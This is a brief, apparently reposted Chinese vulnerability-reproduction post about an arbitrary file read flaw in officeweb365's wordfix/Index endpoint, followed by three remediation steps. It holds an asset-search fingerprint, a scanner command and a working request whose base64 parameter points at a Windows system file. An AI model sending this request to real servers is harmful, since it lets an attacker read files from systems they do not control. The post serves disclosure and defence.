header="officeweb365"
python3 main.py -f url.txt -p officeweb365-wordfix-Index-readfile
直接访问以下链接:
/wordfix/Index?f=YzovV2luZG93cy93aW4uaW5p f后的为base64编码
1、限制wordfix接口的访问
2、升级officeweb365至最新版本
3、官网下载最新安全补丁:https://www.officeweb365.com
原文始发于微信公众号(SCA御盾):【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论